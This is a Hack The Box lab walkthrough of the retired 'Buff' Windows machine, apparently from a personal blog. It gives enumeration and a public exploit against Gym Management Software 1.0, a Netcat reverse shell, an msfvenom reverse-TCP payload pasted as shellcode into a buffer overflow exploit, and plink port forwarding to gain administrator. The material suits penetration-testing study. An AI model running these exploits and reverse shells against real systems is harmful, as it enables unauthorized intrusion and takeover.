Redhalo

Hack the Box Walkthrough – BUFF machine

Hi, you guys !

Welcome to my very first walkthrough of a Hack The Box retired machine. This write up is about the easy Buff machine which has been created by egotisticalSW.

Let’s jump it!

Enumeration

A basic enumeration would start with a nmap scan. I usually use the following command

[email protected]:~/Documents$ nmap -sC -sV -oA  nmap 10.129.50.243 -p-

But here the result was not expected

[email protected]:~/Documents$ nmap -sC -sV -oA  nmap 10.129.50.243 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 10:00 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.46 seconds

As mentioned in the result -Pn parameter may help here.

[email protected]:~/Documents$ nmap -sC -sV -oA  nmap 10.129.50.243 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 10:03 EST
Stats: 0:07:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.43% done; ETC: 10:14 (0:04:18 remaining)
Nmap scan report for 10.129.50.243
Host is up (0.063s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE    VERSION
5040/tcp open  unknown
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 761.09 seconds

Much better indeed.

We can read that there is an apache http running on port 8080 – let’s have a look.

Looks like a site for a fitness gym or something like that

After a quick review of the available pages, I found out the CMS used for the site on the contact.php page: Gym Management Software 1.0

Foothold

A look at searchsploit provides us an interesting exploit:

If you are like me and use a new and fresh install of Kali you may have some error messages about missing modules when you execute the exploit:

[email protected]:~/Documents$ python 48506.py http://10.129.29.204:8080/
Traceback (most recent call last):
  File "48506.py", line 37, in <module>
    import requests, sys, urllib, re
ImportError: No module named requests

and

[email protected]:~/Documents$ python 48506.py http://10.129.50.243:8080
Traceback (most recent call last):
  File "48506.py", line 38, in <module>
    from colorama import Fore, Back, Style
ImportError: No module named colorama

You must install it with the following command:

[email protected]:~/Documents$ curl -0 https://bootstrap.pypa.io/get-pip.py -o get-pip.py
[email protected]:~/Documents$ python get-pip.py
[email protected]:~/Documents$ python -m pip install requests
[email protected]:~/Documents$ python -m pip install colorama

Then we can start the python exploit:

Very nice: we have a basic shell.

Let’s upgrade it by using the windows version of Netcat.

Start your web server on your kali and download the netcat binary which can be found in /usr/share/windows-binaries from the buff machine.

I create a netcat listener with the following command:

nc -lvnp 4242

Then the following on the buff machine to have a remote shell:

nc.exe 10.10.14.51 4242 -e cmd.exe

Lateral Movement

Navigating through folders I have access, I found an executable in the downloads folder of the user shaun

It is not here for nothing..

Again with a searchsploit command we have nice results:

Privilege Escalation

I have used the following: https://www.exploit-db.com/raw/48389

I edited the exploit with the following msfvenom command

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=1337 EXITFUNC=thread -b "\x00\x0d\x0a" -f python

I have changed the following part:

payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))        
buf = padding1 + EIP + NOPS + payload + overrun 
try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))

to this:

buf =  b""                                                                                                                                                                                                                                 
buf += b"\xd9\xc5\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xa6\x49\x07"                                                                                                                                                                             
buf += b"\x99\xb1\x52\x31\x58\x17\x83\xc0\x04\x03\xfe\x5a\xe5"                                                                                                                                                                             
buf += b"\x6c\x02\xb4\x6b\x8e\xfa\x45\x0c\x06\x1f\x74\x0c\x7c"                                                                                                                                                                             
buf += b"\x54\x27\xbc\xf6\x38\xc4\x37\x5a\xa8\x5f\x35\x73\xdf"                                                                                                                                                                             
buf += b"\xe8\xf0\xa5\xee\xe9\xa9\x96\x71\x6a\xb0\xca\x51\x53"                                                                                                                                                                             
buf += b"\x7b\x1f\x90\x94\x66\xd2\xc0\x4d\xec\x41\xf4\xfa\xb8"                                                                                                                                                                             
buf += b"\x59\x7f\xb0\x2d\xda\x9c\x01\x4f\xcb\x33\x19\x16\xcb"                                                                                                                                                                             
buf += b"\xb2\xce\x22\x42\xac\x13\x0e\x1c\x47\xe7\xe4\x9f\x81"                                                                                                                                                                             
buf += b"\x39\x04\x33\xec\xf5\xf7\x4d\x29\x31\xe8\x3b\x43\x41"
buf += b"\x95\x3b\x90\x3b\x41\xc9\x02\x9b\x02\x69\xee\x1d\xc6"
buf += b"\xec\x65\x11\xa3\x7b\x21\x36\x32\xaf\x5a\x42\xbf\x4e"
buf += b"\x8c\xc2\xfb\x74\x08\x8e\x58\x14\x09\x6a\x0e\x29\x49"
buf += b"\xd5\xef\x8f\x02\xf8\xe4\xbd\x49\x95\xc9\x8f\x71\x65"
buf += b"\x46\x87\x02\x57\xc9\x33\x8c\xdb\x82\x9d\x4b\x1b\xb9"
buf += b"\x5a\xc3\xe2\x42\x9b\xca\x20\x16\xcb\x64\x80\x17\x80"
buf += b"\x74\x2d\xc2\x07\x24\x81\xbd\xe7\x94\x61\x6e\x80\xfe"
buf += b"\x6d\x51\xb0\x01\xa4\xfa\x5b\xf8\x2f\x0f\x96\x0c\x83"
buf += b"\x67\xa4\x10\xe6\x4e\x21\xf6\x82\xa0\x67\xa1\x3a\x58"
buf += b"\x22\x39\xda\xa5\xf8\x44\xdc\x2e\x0f\xb9\x93\xc6\x7a"
buf += b"\xa9\x44\x27\x31\x93\xc3\x38\xef\xbb\x88\xab\x74\x3b"
buf += b"\xc6\xd7\x22\x6c\x8f\x26\x3b\xf8\x3d\x10\x95\x1e\xbc"
buf += b"\xc4\xde\x9a\x1b\x35\xe0\x23\xe9\x01\xc6\x33\x37\x89"
buf += b"\x42\x67\xe7\xdc\x1c\xd1\x41\xb7\xee\x8b\x1b\x64\xb9"
buf += b"\x5b\xdd\x46\x7a\x1d\xe2\x82\x0c\xc1\x53\x7b\x49\xfe"
buf += b"\x5c\xeb\x5d\x87\x80\x8b\xa2\x52\x01\xab\x40\x76\x7c"
buf += b"\x44\xdd\x13\x3d\x09\xde\xce\x02\x34\x5d\xfa\xfa\xc3"
buf += b"\x7d\x8f\xff\x88\x39\x7c\x72\x80\xaf\x82\x21\xa1\xe5" 
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + buf))        
 
buf = padding1 + EIP + NOPS + buf + overrun 
 
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,4242))

The next point is that our exploit is a python script and it needs to be executed locally on the victim machine. The problem is that python is not installed. Here comes the pivoting.

I will use the windows binary plink for that.

First it needs to be downloaded on our victim machine

Be aware that I had to download the latest version on the official website https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html to fix the following error message using the binary available on Kali:

FATAL ERROR: Couldn't agree a key exchange algorithm (available: curve25519-sha256,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256)

For the pivoting I had to change the SSH configuration of my Kali machine. I have changed  the SSH port to 4141 instead of 22.

I can’t explain why it is not working but I read somewhere that with HTB VPN it was better to change this port.

Then to start the SSH deamon, run the following command

sudo systemctl start ssh

Then I can run the following command on my victim machine:

plink.exe -P 4141 -l kali -pw "kali" 10.10.14.51 -R 4242:127.0.0.1:8888

I ran a new netcat listener on port 1337

nc -lvnp 1337

Then finally I ran the python exploit.

Our listner got a connection et voilà we are administrator